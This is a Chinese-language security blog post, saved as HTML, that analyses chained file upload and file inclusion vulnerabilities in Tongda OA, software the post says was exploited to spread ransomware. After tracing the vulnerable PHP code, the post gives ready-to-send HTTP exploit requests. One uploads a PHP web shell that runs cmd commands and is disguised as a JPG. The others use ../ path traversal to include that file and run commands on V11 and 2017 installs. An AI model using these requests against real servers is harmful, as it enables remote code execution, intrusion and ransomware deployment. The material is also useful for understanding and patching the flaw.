<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>通达OA_任意文件上传_任意文件包含漏洞分析 | 0neShuttle`s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言通达官网通报此漏洞被用于投放勒索病毒，通过此组合漏洞可达到RCE的效果 漏洞分析本文以当前最新V11版进行分析并复现 其中，任意文件上传漏洞： 12013、2015、2016、2017、V11版：	ispirit\im\upload.php  任意文件包含： 1232013、2015、2016版    无法包含2017版：  mac\gateway.phpV11版：	ispirit\inter">
<meta property="og:type" content="article">
<meta property="og:title" content="通达OA_任意文件上传_任意文件包含漏洞分析">
<meta property="og:url" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="0neShuttle&#96;s Blog">
<meta property="og:description" content="前言通达官网通报此漏洞被用于投放勒索病毒，通过此组合漏洞可达到RCE的效果 漏洞分析本文以当前最新V11版进行分析并复现 其中，任意文件上传漏洞： 12013、2015、2016、2017、V11版：	ispirit\im\upload.php  任意文件包含： 1232013、2015、2016版    无法包含2017版：  mac\gateway.phpV11版：	ispirit\inter">
<meta property="og:locale" content="ZH_CH">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C1.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C2.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C3.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C5.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C6.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C7.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C8.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C9.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C10.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C11.png">
<meta property="og:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C12.png">
<meta property="article:published_time" content="2020-03-28T13:35:25.503Z">
<meta property="article:modified_time" content="2020-03-28T13:41:17.319Z">
<meta property="article:author" content="0neShuttle">
<meta property="article:tag" content="safe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/img%5Ctd_upload_lfi_rce%5C1.png">
  
    <link rel="alternate" href="/atom.xml" title="0neShuttle`s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">0neShuttle`s Blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://clancyb00m.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-通达OA_任意文件上传_任意文件包含漏洞分析" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="article-date">
  <time datetime="2020-03-28T13:35:25.503Z" itemprop="datePublished">2020-03-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      通达OA_任意文件上传_任意文件包含漏洞分析
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>通达官网通报此漏洞被用于投放勒索病毒，通过此组合漏洞可达到RCE的效果</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>本文以当前最新V11版进行分析并复现</p>
<p>其中，任意文件上传漏洞：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2013、2015、2016、2017、V11版：	ispirit\im\upload.php</span><br></pre></td></tr></table></figure>

<p>任意文件包含：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">2013、2015、2016版    无法包含</span><br><span class="line">2017版：  mac\gateway.php</span><br><span class="line">V11版：	ispirit\interface\gateway.php</span><br></pre></td></tr></table></figure>

<h2 id="任意文件上传"><a href="#任意文件上传" class="headerlink" title="任意文件上传"></a>任意文件上传</h2><blockquote>
<p>不能上传php</p>
</blockquote>
<p>漏洞位于 <code>ispirit\im\upload.php</code> 文件中，分析该文件，从头看起：</p>
<p>参数$P由$_POST[“P”]传入，当参数 <code>P</code> 不为空时，包含 <code>inc\session.php</code> 文件，从而绕过登录验证，达到未授权的目的</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C1.png" alt=""></p>
<p>继续向下看：</p>
<blockquote>
<p> 这里第23行函数 <code>td_verify_ids($ids)</code> 中的参数 <code>$ids</code> 从何而来我没有搞懂</p>
</blockquote>
<p>如果 <code>DEST_UID</code> 为空，则表达式 <code>$DEST_UID != &quot;&quot;</code> 不成立，会直接返回 <code>接收方ID无效</code> 这个信息，所以在传入 <code>DEST_UID</code> 时不能为空， <code>DEST_UID</code> 由 <code>$_POST[&quot;DEST_UID&quot;]</code> 传入</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C2.png" alt=""></p>
<p>下面这段代码判断如果 <code>$DEST_UID=0</code> 并且 <code>$UPLOAD_MODE!=2</code>时返回错误信息并退出，那我们在给 <code>DEST_UID</code> 传值时不传0或者给 <code>UPLOAD_MODE</code> 传值为2即可绕过</p>
<blockquote>
<p>这里$UPLOAD_MODE从哪里来一直没找到，直到看到 <strong>蛇獴攻防实验室</strong> 写的一篇 <a href="https://mp.weixin.qq.com/s/wE7_c4GhbV9LKBfRMg_TsQ" target="_blank" rel="noopener">通达OA上传漏洞之变量覆盖分析</a> 的文章，才知道原来这个参数是通过 <code>inc\common.inc.php</code> 中一个变量覆盖形成的</p>
</blockquote>
<p><img src="img%5Ctd_upload_lfi_rce%5C3.png" alt=""> </p>
<p>从这里开始进入文件上传的环节，当有文件传入时，即 <code>1 &lt;= count($_FILES)</code> ，判断如果传入的 <code>UPLOAD_MODE=1</code> 时，比较上传的文件和url解码后的文件名是否一致，不一致则将文件名解码</p>
<blockquote>
<p>疑问：文件在哪里进行上传的，我找不到代码</p>
</blockquote>
<p><img src="img%5Ctd_upload_lfi_rce%5C5.png" alt=""></p>
<p>跟进 <code>upload</code> 函数：</p>
<blockquote>
<p>inc\utility_file.php</p>
</blockquote>
<p>第1680行，当传入的文件 <code>name=ATTCHMENT</code> 时，即 <code>$KEY = &quot;ATTCHMENT&quot;</code> ，导致 <code>($KEY != $PREFIX)</code> 条件不成立，继续向下，第1692行，函数 <code>is_uploadable</code> 是对上传文件的后缀进行判断</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C6.png" alt=""></p>
<p>跟进 <code>is_uploadable</code> 函数：</p>
<blockquote>
<p>inc\utility_file.php</p>
</blockquote>
<p>可以看到禁止上传后缀为 <code>php</code> 的文件</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C7.png" alt=""></p>
<p>返回 <code>ispirit\im\upload.php</code> 文件，继续向下看，寻找能回显文件名的代码，在第124行：</p>
<p>可以看到当 <code>UPLOAD_MODE=2</code> 并且上传成功会回显文件名等相关信息</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C8.png" alt=""></p>
<p>至此我分析的结果就是需要传入如下参数：</p>
<ol>
<li>P且P不为空即可，如P=1</li>
<li>DEST_UID不为空即可，如DEST_UID=1</li>
<li>UPLOAD_MODE需要等于2，才能得到回显，即UPLOAD_MODE=2</li>
<li>上传文件的参数名为 <code>ATTCHMENT</code> ，并且不能传入php后缀开头的文件</li>
</ol>
<p>通过黑盒测试，上传文件后回显的结果如下所示，在 <code>/attach/im/2003/</code> 文件夹下发现该文件：</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C9.png" alt="黑盒回显的图片"></p>
<p>这里上传后的文件名为1234725920.test.jpg</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C10.png" alt="文件保存位置的图片"></p>
<p>至此，文件上传漏洞复现结束，单凭这一个漏洞，我能想到的危害是上传一个包含xss代码的html页面诱导用户访问获取相关cookie；想要完成RCE，就需要找一个任意文件包含的漏洞来完成攻击</p>
<h2 id="任意文件包含"><a href="#任意文件包含" class="headerlink" title="任意文件包含"></a>任意文件包含</h2><p>V11版漏洞位于 <code>ispirit\interface\gateway.php</code> ：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">ob_start();</span><br><span class="line">include_once &quot;inc&#x2F;session.php&quot;;</span><br><span class="line">include_once &quot;inc&#x2F;conn.php&quot;;</span><br><span class="line">include_once &quot;inc&#x2F;utility_org.php&quot;;</span><br><span class="line"></span><br><span class="line">if ($P !&#x3D; &quot;&quot;) &#123;</span><br><span class="line">	if (preg_match(&quot;&#x2F;[^a-z0-9;]+&#x2F;i&quot;, $P)) &#123;</span><br><span class="line">		echo _(&quot;非法参数&quot;);</span><br><span class="line">		exit();</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	session_id($P);</span><br><span class="line">	session_start();</span><br><span class="line">	session_write_close();</span><br><span class="line">	if (($_SESSION[&quot;LOGIN_USER_ID&quot;] &#x3D;&#x3D; &quot;&quot;) || ($_SESSION[&quot;LOGIN_UID&quot;] &#x3D;&#x3D; &quot;&quot;)) &#123;</span><br><span class="line">		echo _(&quot;RELOGIN&quot;);</span><br><span class="line">		exit();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if ($json) &#123;</span><br><span class="line">	$json &#x3D; stripcslashes($json);</span><br><span class="line">	$json &#x3D; (array) json_decode($json);</span><br><span class="line"></span><br><span class="line">	foreach ($json as $key &#x3D;&gt; $val ) &#123;</span><br><span class="line">		if ($key &#x3D;&#x3D; &quot;data&quot;) &#123;</span><br><span class="line">			$val &#x3D; (array) $val;</span><br><span class="line"></span><br><span class="line">			foreach ($val as $keys &#x3D;&gt; $value ) &#123;</span><br><span class="line">				$keys &#x3D; $value;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		if ($key &#x3D;&#x3D; &quot;url&quot;) &#123;</span><br><span class="line">			$url &#x3D; $val;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	if ($url !&#x3D; &quot;&quot;) &#123;</span><br><span class="line">		if (substr($url, 0, 1) &#x3D;&#x3D; &quot;&#x2F;&quot;) &#123;</span><br><span class="line">			$url &#x3D; substr($url, 1);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		if ((strpos($url, &quot;general&#x2F;&quot;) !&#x3D;&#x3D; false) || (strpos($url, &quot;ispirit&#x2F;&quot;) !&#x3D;&#x3D; false) || (strpos($url, &quot;module&#x2F;&quot;) !&#x3D;&#x3D; false)) &#123;</span><br><span class="line">			include_once $url;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	exit();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>首先可以看到第47行使用 <code>include_once</code> 函数包含了 <code>$url</code> ，向上追溯，在第37行， <code>$url = $val;</code> ，再往上找到第27行，可以看到 <code>$val</code> 由 <code>$json</code> 遍历而来，由此分析，当传入如下格式的参数后：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">json&#x3D;&#123;&#39;url&#39;:&#39;&#x2F;attach&#x2F;im&#x2F;2003&#x2F;1234725920.test.jpg&#39;&#125;</span><br></pre></td></tr></table></figure>

<p>后台接收到 <code>$json</code> 的值即为 <code>{&#39;url&#39;:&#39;/attach/im/2003/1234725920.test.jpg&#39;}</code> ,</p>
<p>第27行遍历json，得到： <code>$key=&#39;url&#39;</code> 、 <code>$val=&#39;/attach/im/2003/1234725920.test.jpg&#39;</code> ，向下看到第36行，条件成立，则 <code>$url=&#39;/attach/im/2003/1234725920.test.jpg&#39;</code> ，继续向下，由于第46行的限制，这里我们需要更新payload为以下格式，使用 <code>../</code> 绕过限制：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">json&#x3D;&#123;&quot;url&quot;:&quot;&#x2F;general&#x2F;..&#x2F;..&#x2F;attach&#x2F;im&#x2F;2003\&#x2F;1234725920.test.jpg&quot;&#125;</span><br><span class="line">或</span><br><span class="line">json&#x3D;&#123;&quot;url&quot;:&quot;&#x2F;ispirit&#x2F;..&#x2F;..&#x2F;attach&#x2F;im&#x2F;2003\&#x2F;1234725920.test.jpg&quot;&#125;</span><br><span class="line">或</span><br><span class="line">json&#x3D;&#123;&quot;url&quot;:&quot;&#x2F;module&#x2F;..&#x2F;..&#x2F;attach&#x2F;im&#x2F;2003\&#x2F;1234725920.test.jpg&quot;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="img%5Ctd_upload_lfi_rce%5C11.png" alt=""></p>
<p>最终成功达到任意文件包含的效果，包含上传的exp最终达到RCE</p>
<blockquote>
<p><code>$json</code> 从何而来？它也是通过变量覆盖，参数名变成了变量名，和任意文件上传文件中的 <code>$UPLOAD_MODE</code> 一样</p>
</blockquote>
<p>包含上传的exp达到RCE的效果：</p>
<p><img src="img%5Ctd_upload_lfi_rce%5C12.png" alt=""></p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>任意文件上传exp：</p>
<blockquote>
<p>2013、2015、2016、2017、V11版通用</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;ispirit&#x2F;im&#x2F;upload.php HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: python-requests&#x2F;2.21.0</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: *&#x2F;*</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 608</span><br><span class="line">Content-Type: multipart&#x2F;form-data; boundary&#x3D;f1f02f51b75a64feb5c8b4e17b723449</span><br><span class="line"></span><br><span class="line">--f1f02f51b75a64feb5c8b4e17b723449</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;P&quot;</span><br><span class="line"></span><br><span class="line">123</span><br><span class="line">--f1f02f51b75a64feb5c8b4e17b723449</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;DEST_UID&quot;</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">--f1f02f51b75a64feb5c8b4e17b723449</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;UPLOAD_MODE&quot;</span><br><span class="line"></span><br><span class="line">2</span><br><span class="line">--f1f02f51b75a64feb5c8b4e17b723449</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;ATTACHMENT&quot;; filename&#x3D;&quot;test.jpg&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">$command&#x3D;$_POST[&#39;cmd&#39;];</span><br><span class="line">$wsh &#x3D; new COM(&#39;WScript.shell&#39;);</span><br><span class="line">$exec &#x3D; $wsh-&gt;exec(&quot;cmd &#x2F;c &quot;.$command);</span><br><span class="line">$stdout &#x3D; $exec-&gt;StdOut();</span><br><span class="line">$stroutput &#x3D; $stdout-&gt;ReadAll();</span><br><span class="line">echo $stroutput;</span><br><span class="line">?&gt;</span><br><span class="line">    </span><br><span class="line">--f1f02f51b75a64feb5c8b4e17b723449--</span><br></pre></td></tr></table></figure>

<p>任意文件包含exp：</p>
<blockquote>
<p>V11版</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;ispirit&#x2F;interface&#x2F;gateway.php HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: python-requests&#x2F;2.21.0</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: *&#x2F;*</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 108</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">json&#x3D;&#123;&quot;url&quot;:&quot;&#x2F;general&#x2F;..&#x2F;..&#x2F;attach&#x2F;im&#x2F;2003&#x2F;1234725920.test.jpg&quot;&#125;&amp;cmd&#x3D;whoami</span><br></pre></td></tr></table></figure>

<blockquote>
<p>2017版</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;mac&#x2F;gateway.php HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: python-requests&#x2F;2.21.0</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: *&#x2F;*</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">Cookie: PHPSESSID&#x3D;123</span><br><span class="line">Content-Length: 72</span><br><span class="line"></span><br><span class="line">json&#x3D;&#123;&quot;url&quot;:&quot;&#x2F;general&#x2F;..&#x2F;..&#x2F;attach&#x2F;im&#x2F;2003&#x2F;1234725920.test.jpg&quot;&#125;&amp;cmd&#x3D;whoami</span><br></pre></td></tr></table></figure>

<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><ol>
<li><a href="https://forum.90sec.com/t/topic/883" target="_blank" rel="noopener">通达OA任意文件上传分析 </a> </li>
<li><a href="https://mp.weixin.qq.com/s/wE7_c4GhbV9LKBfRMg_TsQ" target="_blank" rel="noopener">通达OA上传漏洞之变量覆盖分析</a> </li>
<li><a href="https://github.com/jas502n/OA-tongda-RCE" target="_blank" rel="noopener">https://github.com/jas502n/OA-tongda-RCE</a> </li>
</ol>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://clancyb00m.github.io/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" data-id="ck8bo04ds0000i4w32tnaajh2" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/03/28/%E9%80%9A%E8%BE%BEOA_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">通达OA_任意文件上传_任意文件包含漏洞分析</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 0neShuttle<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>